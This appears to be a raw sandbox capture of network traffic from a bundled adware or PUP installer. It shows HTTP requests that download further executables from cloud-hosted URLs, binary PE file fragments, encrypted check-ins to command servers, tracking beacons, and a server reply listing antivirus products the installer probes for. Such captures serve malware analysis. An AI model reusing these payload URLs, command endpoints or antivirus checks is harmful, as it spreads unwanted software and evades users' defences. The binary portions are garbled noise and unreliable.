Accept-Ranges: bytes
ETag: "1431408217"
Last-Modified: Tue, 12 May 2015 05:23:37 GMT
Cache-Control: max-age=6311
Content-Length: 8076624
Content-Type: text/plain; charset=UTF-8
X-HW: 1441175957.dop017.am4.t,1441175956.cds063.am4.c
B8.s.S^.....r...3.....R$.-..c$..D.^..k*;.....s.lF.@...pr|.e ..}.A.c.-g.....vU...zY x.O$....8.......)V..s I_.I.YT$.,.%%".D..W.u~=.....N&W.3\....knG5..|osy..bJ...~...(.T........u.ca..aq..Kh\RN7sk......P.s*:m...0u.g[...[h.....<b..sSa..4.eB.l..-..5...5..2.:j.A..y.....6.~".0,.../ p.....R..8.....!.......R..Z_q..o@..y........7.sn..o..........._..](.1...C.c6..P..p.DCR.V...lh...d.......&.1.....Y.RP....g.P.c..&.........d.....p.......>d.......j..&..0.X.U....>L...r.N..I.I.....W.m..x..C.a.c._.u{9.3.......L..lV..1.&...u......rw(.ud._d.R..........x..~.6...f'..L=....r...t.@........D...wB..5.....JR. fy.R.12.H.wg.mo...B...L..<.Eo.m.d.'.-^....z..;...#....T]..2.>...@.m.T,....0.<.~e.._..'H..u...F..x..........w....?..S...yV.....$}.1..oI.....L..../...........K%y ....'x M...9.Ae(.D.yOD.I.s..........P..i..."|...!...#.]....A.p..s.o.c..".....R6.....<X.r...8.P.....'../uN.qJ....>...P...,.A...."...w".@.h.j..1...6O.u'..G...wE.-z.p...w....S...&M*.q...........J.)8...i.6}..F..*HC.,Xc..l..F..8 /..O.~..r......8 ...\X.d}..........H!...x!..j....h{R....tV.g......f........on^RN..V..(.V.......K.V.\..`b..GP....A...T...w6.../~....7.Q.7.........-S.T8.t.q....C.1.?....3...NF....!01..J.*....h.r..t...9..f..R.o....v.....Jp...Fw...x.../..@vk...et... I\q&F.[-.........4..KP...e....fd-..K.$..L4.(...M........h..d..l..Q.^.E....&s5.. p.h...po...g...b......j:...o*..),.>.NB..I....'.......K...<.}.`8q.1!u~.....WY.....|.&..04.t...c..-S.y........4w........RY.(.#3i.'.n]q[..D..2.C..b.J...m ..rCX V.?;.h.4.C.6....S.AL...ac..U......./Tu.f..D....y.
<<< skipped >>>
GET /7121923af824073a25b2b7e6ba0a6e0e.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d1mdi78qyff344.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 59213
Connection: keep-alive
Date: Thu, 27 Aug 2015 02:50:12 GMT
Last-Modified: Wed, 26 Aug 2015 15:24:15 GMT
ETag: "ad3ce40da858a76f235974af46c18365"
Accept-Ranges: bytes
Server: AmazonS3
Age: 32740
X-Cache: Hit from cloudfront
Via: 1.1 7f0216233154388a0ffe191ece5a7b12.cloudfront.net (CloudFront)
X-Amz-Cf-Id: _IRbWw1lzCC0ftNTefVDUYqHa-IAd-PVwQGvtNppqOxkh16PQZu39A==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................`...............................................t.......P...............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...`...............................rsrc........P.......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /setup_362.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: special-bundles.s3-website-us-east-1.amazonaws.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: INqQFFACQA DY6wVTtlB1vR7XURiltc2nZtwHiSLnCBjqvqenoItBDMr 5ihYPxEg4xEFCro9Os=
x-amz-request-id: 5459C4C956890976
Date: Wed, 02 Sep 2015 06:39:47 GMT
Last-Modified: Wed, 10 Jun 2015 05:41:11 GMT
ETag: "0ccf900044e0e4edf36e89008e2c6aa7"
Content-Type: application/octet-stream
Content-Length: 254464
Server: AmazonS3
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3...R...R...R.......R....5..R....4..R...*...R...R...R....1..R.......R.......R..Rich.R..................PE..L...|.wU.................(...........4.......@....@..........................0............@.................................<...P....................................B...............................v..@............@...............................text...\&.......(.................. ..`.rdata..&m...@...n...,..............@..@.data....4..........................@....rsrc...............................@..@.reloc...'.......(..................@..B...........................................................................................................................................................................................................................................................................................................................................................BB...........U..V.....BB..o....E..t.V.E........^]............V..W...r...$......;.u.............s...tD.....9 .u1...v5..B...y. .u ...v$..B...y. .u....v...B...I. ...._...^._3.^................U..j.hI.B.d.....P..,...B.3..E.SVWP.E.d.......3..]....G.3..F......^..u..}..E.f...]..E.....;.......3..U............u..U..G..M....r.......f.<.=.........r.........4.V.a........u... t.../..........r........M.f...f.T].C....M....ux3...D}.Ph..B.3..|...f.D}.G...|..M..E.............E.f.U................E.........f.U.f.E.3.
<<< skipped >>>
GET /cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: prof.eorezo.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:39:35 GMT
Server: Apache/2.2.22
x-eorezo-crc32: -1
x-eorezo-crypted: 1
x-eorezo-length: 357
Set-Cookie: conftime=1441175975; expires=Mon, 27 Dec 15 00:26:00 GMT; domain=eorezo.com; path=/;
Set-Cookie: EoRezo=194.242.96.218.1441175975655411; path=/; expires=Fri, 02-Oct-15 06:39:35 GMT
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
1ec..Xg8nssf/4H10OdRv/PBlQCyF9RkAzpy/PPG8paJnu rCw3mAaqFpX2 ZKEgbMMA2htCshaMIPoMPkSppoNIfvqD ZyWxTIl1LyUx8yWjlHHNhn1WF5uF0H6qLM uZMwkTiGldZX5iSj uCsroOrbj/qdFgfbU9hmNOF2lZWiRA4D1nmKWD56o30N03aMe cM TaH0Zt8tkkpVIrV86sjShA2ibI4frmimtvqttCmZq2iOlFsKeYNJxrj/jP12cx2lA7NiBrk4PKXXug7tpKb65atNqDRlvUKKAF9c9zPzn4F2eh8GAfVbPOtZhSf/o/50RLSfemcISdhtiO8gTINReeSoYdUAqhmbrscZPjwnJCjKfgrUbQCV1J0DBwv2J mQsGJZQH4xDticU8Aw3zUoh3vFhu1Wg3CUqlkPjaoTHwm7LcFgkhAy A9qiL9G3nGtxC4eGJD3HM29TeMBpi5wjFtJRirkgPWAr1gnD hmf0=..0..
POST /cgi-bin/get_protect.cgi HTTP/1.1
x-spidermessenger-crypted: 2
x-spidermessenger-crc32: 286788407
x-spidermessenger-length: 275
Content-Type: text/*
User-Agent: gmsd_re_005010077-gmsd_re_005010077
Host: prof.youandmeandmeandyouhihi.com
Content-Length: 394
Cache-Control: no-cache
ujXl2iaEv38K+/yRWyXC+m7rYR+qMqcsGBrDjQZma9BSciU5l/OSaPVnWOurfN3Hx17O83KoD357dERtblRTDdgA48KOdPrBeHznjIqG35Zo6z0FtNLmETstYDtqkBbkFICEArjQwmTACEtI9Xf/ns3LsGeNBauwkIwODLVUzDkFBUKMVqkBi7rgZbbs36bUdAV2YPcDyENxP/HsXZ0F4cg+TM2VLW/5bP8AxA4Xlp59koS+nfQFaUslV9eCHTpOlSCkUo70TMOXGTe/Y87xxapD9oUJUKjxno+VzA7ZMJyXa2uBcg8hGrtROTJ4P2SL9+8MRivFo/t5UDgzY3XANOMSbFVtsQXfjgRnJbogsDQ=
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:39:43 GMT
Server: Apache/2.2.22
x-SPIDERMESSENGER-crypted: 2
x-SPIDERMESSENGER-length: 26780
x-SPIDERMESSENGER-crc32: -1
Set-Cookie: conftime=1441175983; expires=Mon, 27 Dec 15 00:26:00 GMT; domain=youandmeandmeandyouhihi.com; path=/;
Set-Cookie: EoRezo=194.242.96.218.1441175983381150; path=/; expires=Fri, 02-Oct-15 06:39:43 GMT
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
8b8c..0NogVEVNeZU/g6fcxXpPm8L/TbLACp6qNZeGXV8m6ec/K8dk0/yY5pEI4yS2Vf5K1CwWkZ8xeq2FoHZiTq7fWERGyCAg88jpdmzVknJJbtdhSvgVLNEQZKmNKxPN3kfibTew3 ynOvjDhwwNX4fU19cLBEHf1q/Xj32GKoBkNDpFEvQc2RNtJ53wo0SzNY73Ov0OwqXrzI2YO2u8inUw0lZxXi5A9 i/YeIEUAylzK2mkMxhwdoTj9gS4eUxasnoHd0YO8ZIrC s7kVZ8zf3XYwbhIAyLIRN7A A1TaDPHCwk0EdeGTllofpN6OjrHCGEtxASQhJputEDM3gJ6 fxHQbc6bHhjmbiYQgwx5zG1/iW5BuRPx6Jd6E0nHHhz 3Vy3JW33rCnQApc4ZcGVjqam7 20b9S5nEkpNhCYwXMCLiKYV2RKuiuct/JXQXzzz60iTtcjPiFpRY4vAzCB7X91NcJMm/4jpBZbh2nuJVJ7EBqWhzMHNrCLILyeQnTRYmRAzGrmHJyuXQwMIt0OwB/zGtwiLrB5vC0x otwaFPlSvg 9LkPZ49PkpxBjMU90Rvv 27wT6tkZId4aOsoN/xTuaZ91C8M2hvXhnlkpwDuvQQtvpJpkbvC W/AL1ml6ZlBGd8iMLELs0auYYT KOPCz2G4Y9S9cp9 GOhxujubLXS/SdV4a2psD6tOwBZhx1iFLkL2kC Te27 LQ/iNAhzAKtA 7Y02qkpPXpLE0RsguHwJv3 S4lGwYR iN663d6vGvWbKY4hU1XM4eZyANf747RjT/oItO32kXOOaj8hv47N4ZiWhI YloXLN8PSh6TnoajUka0ON x0iK4YMzd3sNMnNr/CyDytDgMbKZ8FME3WW8Ns tk/v 4NNeN7QOVt1E7mp6ilVVR52ilOqloYvDP6bCN2lKOQ6wPTDBjL8wIXnJIY2iYgtlh4FwbQV7b/QfBok2NpaUtHcBGwsFNp5zzvIh78n2OX3ScO3/IlUitKER1TPI3z B0Qyjl75gnzy uwDMNRlklgu7CzcFZamsN/a0VwLoe LNOUiVj7y/PsDIgOWmtVMCwoJWG49rtUM1pmbHAD0nropsAsHSQ8wGvlXchKb4VB8TBzut4ZrZUEkQGuV3BF7ZgN5BpNtyIYc/n5xqToG8084Tvylmz6td0QfyHrubjWvvPhrgUzgvmvQJCMEQvN2eqFNApU5hBE0JiEbRJgNkx08/4QXTnQ7Nfqbg3J3xwgB0cyKXlVR00iAgO/IOhwQRSzuJh5DNGxdD7LgHEqUdAtP M/sXOPuWSj/u/EsHqU13VBMvunmPoIecEHEaCQX/MiwVruskdfeVOH7/vXlzQiwqrTEbbBtS JjapXyk4gZc69sW62IavdDOX6fZDEv2s3avtqZgqFeNimOCVNexdiw7TGe/jXx9evKkcjVQMVWKaT0qcwDn9FuZ94xthjOgWH3oqnAFLV2nc1N8UF0aIpnKLlWabq6/oU0qnXGvAtmQpDDVCXtU2FMuMmNBMz6V
<<< skipped >>>
GET hXXp://events.afsbdfgds.net/?p=cHViX2lkPTM2MiZzZXR1cF9pZD04MDAmZXh0cmFfcGFyYW1zPWZpbml0byZldmVudD03JnNpZD02NjYmbWFjPTc3Nw== HTTP/1.1
Host: events.afsbdfgds.net
Proxy-Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Sep 2015 06:41:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
0..
GET /installer.gif?action=started&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=106&crtnm=OralTeams&rnd=2620 HTTP/1.1
Accept: */*
Host: mystats.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: al rxtr5LTpSfOs/FUHoEYpaGFfWKljedJ5k9al3tZTsqVcI2q2comx4ZxvXTFIEtB6tmBDZmCo=
x-amz-request-id: 4C7FB26AC7F4C10B
Date: Wed, 02 Sep 2015 06:39:17 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: al rxtr5LTpSfOs/FUHoEYpaGFfWKljedJ5k9al3tZTsqVcI2q2comx4ZxvXTFIEtB6tmBDZmCo=..x-amz-request-id: 4C7FB26AC7F4C10B..Date: Wed, 02 Sep 2015 06:39:17 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..
GET /cmmdWriter.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d2fpsq9kg43yka.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 42510
Connection: keep-alive
Date: Tue, 25 Aug 2015 07:42:47 GMT
Last-Modified: Tue, 25 Aug 2015 07:35:53 GMT
ETag: "051e3f4fd2fc016148ab1e9c53e286d1"
Accept-Ranges: bytes
Server: AmazonS3
Age: 17597
X-Cache: Hit from cloudfront
Via: 1.1 affe26bf02a36a4a45ea1eb3ce2b4a62.cloudfront.net (CloudFront)
X-Amz-Cf-Id: pFYt45LD08TPS_Mdh6J4o_tzn1fMb09J3O0b14LWY0LJc4Lcc2_NrA==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z...........0.......p....@..........................P...............................................s.......@...............................................................................p...............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data...x............p..............@....ndata.......@...........................rsrc........@.......t..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[...U.
<<< skipped >>>
GET /0.gif?2948573&101&101 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sstatic1.histats.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:39:58 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
Set-Cookie: CountUid=ff9fe256-0dfg-4855-93b5-43965b494d4d; domain=.histats.com; Max-Age=31536000; Expires=Sat, 19-Sep-2015 07:20:27 GMT
GIF89a.............!.......,...........D..;..
GET hXXp://events.afsbdfgds.net/?p=cHViX2lkPTM2MiZzZXR1cF9pZD04MDAmZXh0cmFfcGFyYW1zPXN0YXJ0byZldmVudD0xJnNpZD02NjYmbWFjPTc3Nw== HTTP/1.1
Host: events.afsbdfgds.net
Proxy-Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Sep 2015 06:41:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
0..
POST /FCL_Co_Unq_remote_v5.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.fcesneim.us
Content-Length: 106
Connection: Keep-Alive
Cache-Control: no-cache
from=nsis&type=Reg&pubid=11355&CbId=8907&BundleVersionID=IM_240914@01&mid=qGKynuZ0mukeZvxnJUBzZDYiT/aeDKox
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:40:01 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 1073
Connection: close
Content-Type: text/html; charset=UTF-8
hXXp://VVV.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote.php..http://VVV.stsunsetwest.com/DS_Unq_trackstats_mon.php..UA..hXXp://VVV.stsunsetwest.com/DS_AdvAffiliateId.php..194.242.96.218_2015-09-02_02:40:01..NULL..12#RE2|Systweak\RegClean Pro\Version 6.1..460#RE2|InstalledBrowserExtensions\32846,RE2|ESET,RE2|Malwarebytes' Anti-Malware,RE2|Malwarebytes,RE2|Avira,RE2|Fortinet\FortiClient,RE2|AVG,RE3|AVAST Software,RE3|AVAST,RE3|Microsoft\Windows\CurrentVersion\Uninstall\avast,RE3|VIPRE Antivirus,RE3|ESET,RE3|Malwarebytes' Anti-Malware,RE3|Avira,RE3|KasperskyLab,RE3|Norton,RE3|Fortinet\FortiClient,RE3|AVG,RE3S|Avira..575#O|V^0*S^0*E^0*EV1^0*T^0,B1|I,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,RE2|Opera Software,RE3|Opera Software..576#O|V^0*S^0*E^0*EV1^0*T^0,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera Software..
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=131221&tag=RE_CLICKMEIN_INSTALL_F11 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:39:45 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Wed, 02 Sep 15 06:39:00 GMT
Set-Cookie: _c4aid=4F9E5D7D86A1476D86546936BCD277CB; expires=Mon, 29 Feb 16 06:39:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=4F9E5D7D86A1476D86546936BCD277CB,1441175985.54277; expires=Mon, 29 Feb 16 06:39:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 131221);......0..
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=131221&tag=RE_CLICKMEIN_COUNT1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:39:45 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Wed, 02 Sep 15 06:39:00 GMT
Set-Cookie: _c4aid=682C721FA98B4A48B126DA45369AD8FB; expires=Mon, 29 Feb 16 06:39:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=682C721FA98B4A48B126DA45369AD8FB,1441175985.84974; expires=Mon, 29 Feb 16 06:39:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 131221);......0..
GET /download/dwn/prq4633/este/re/setup_gmsd_re.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.taxideataxus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:39:30 GMT
Server: Apache/2.2.16
Last-Modified: Tue, 01 Sep 2015 12:26:26 GMT
ETag: "55e0207-5888e8-51eaea8a3c080"
Accept-Ranges: bytes
Content-Length: 5802216
Keep-Alive: timeout=15, max=200
Connection: Keep-Alive
Content-Type: application/x-msdos-program
MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................*....................@..........................0.......1Y..........@..............................P....................|X.............................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.............@......................@..P..................................................................................................................................................................string................<.@.....m.@..........)@..(@..(@..)@.....$)@..Free..0)@..InitInstance..L)@..CleanupInstance..h(@..ClassType..l(@..ClassName...(@..ClassNameIs...(@..ClassParent...)@..ClassInfo...(@..InstanceSize...)@..InheritsFrom...)@..Dispatch...)@..MethodAddress..<*@..MethodName..x*@..FieldAddress...)@..DefaultHandler...(@..NewInstance...(@..FreeInstance.TObject.@...@..% .@....%..@....%..@....%..@....%..@....%..@....%..@....%(.@....%..@....%..@....%..@....%..@....%..@....%..@....%..@....%..@.
<<< skipped >>>
GET /policyname.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d10huri5h4o4a3.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 54658
Connection: keep-alive
Date: Tue, 25 Aug 2015 08:25:57 GMT
Last-Modified: Tue, 25 Aug 2015 08:20:25 GMT
ETag: "6f61b80a1552c32073f082cc1798cd71"
Accept-Ranges: bytes
Server: AmazonS3
Age: 7286
X-Cache: Hit from cloudfront
Via: 1.1 462cdb6020d941cbe166e3fece73ca6d.cloudfront.net (CloudFront)
X-Amz-Cf-Id: tQge8xEr9WOtxaDTSTNc6g8aoOiR3gvCywxKczszbxC2wPKahhivfQ==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t.......................................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc................z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /?domain=afsbdfgds.net&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=362&setup_id=800 HTTP/1.1
Host: VVV.djapp.info
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Wed, 02 Sep 2015 06:41:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: hXXp://d22nes4susdva1.cloudfront.net/finalinstaller/24.08.2015/FinalInstaller_dotnet4.exe
0..HTTP/1.1 302 Moved Temporarily..Server: nginx..Date: Wed, 02 Sep 2015 06:41:25 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..Location: hXXp://d22nes4susdva1.cloudfront.net/finalinstaller/24.08.2015/FinalInstaller_dotnet4.exe..0..
GET /finalinstaller/24.08.2015/FinalInstaller_dotnet4.exe HTTP/1.1
Connection: Keep-Alive
Host: d22nes4susdva1.cloudfront.net
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 3030016
Connection: keep-alive
Date: Mon, 24 Aug 2015 06:58:00 GMT
Last-Modified: Mon, 24 Aug 2015 06:48:08 GMT
ETag: "a3078153a7a53bfc0a7a0b8fd20d757a"
Accept-Ranges: bytes
Server: AmazonS3
Age: 6170
X-Cache: Hit from cloudfront
Via: 1.1 de7a549023f0ea5ae15f58d27aeb67c7.cloudfront.net (CloudFront)
X-Amz-Cf-Id: gNz3D2rsk9-RiW9ufrG2752h4ANRAyxsqEFnIIrxZ8YVWjiS6BKd1A==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z..U.................|-...........-.. ........@.. ................................/...@.................................@.-.K.....-......................`........-.............................................. ............... ..H............text....{-.. ...|-................. ..`.rsrc.........-......~-.............@..@.reloc.......`.......:..............@..B................p.-.....H.......PD%.TV.......'......._ ..........................................(.'..*.r.(......}......}......}....*....(....o....*.0../.......(.'....o.............(\'.....r...p...(1'.....(B'.....( '.....r...p...(5'....(....()'..o....,.r...p*.o....(*'..(Z'..(X'..r...p(....()'..o....,.(*'..(Z'..(X'..r...p(....()'..*.o..............(]'.....(6'.....(5'.....(B'.....(]'.....(Z'.....(]'.....(?'.....(.'......(D'......r...p..(....()'..o....,.r...p*.*..0..4.......r!..pr...p.(......,..o....(....o.........&..~....*.*........)).......0..4.......r...pr...p.(......,..o....(....o.........&..~....*.*........))........*...$.](m...&*2..(....&..Z*....0..........rm..p..c.d(....&..(......*..2..(....&..Z*....0..........r...p..c.d(....&..(......*..2..(....&..Z*....0..........r...p..c.d(....&..(......*..2..(....&..Z*....0..........r...p..c.d(....&..(......*..2..(....&..Z*....0..........r...p..c.d(....&..(......*..2..(....&..Z*....0..........r...p..c.d(....&..(......*..2..(....&..Z*....0..........r...p..c.d(....&..(......*..2..(....
<<< skipped >>>
GET /download.php?l4J9dw== HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.codec13sudha.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Found
Date: Wed, 02 Sep 2015 06:39:43 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Cache-Control: no-cache, must-revalidate
Content-Disposition: attachment; filename="InstallMonetizer.exe"
Location: hXXp://secured.nmsgv.us/VuuPC_VO2_8907.exe
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Sep 2015 06:39:09 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 126
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"tst=&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Sep 2015 06:39:09 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:09 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
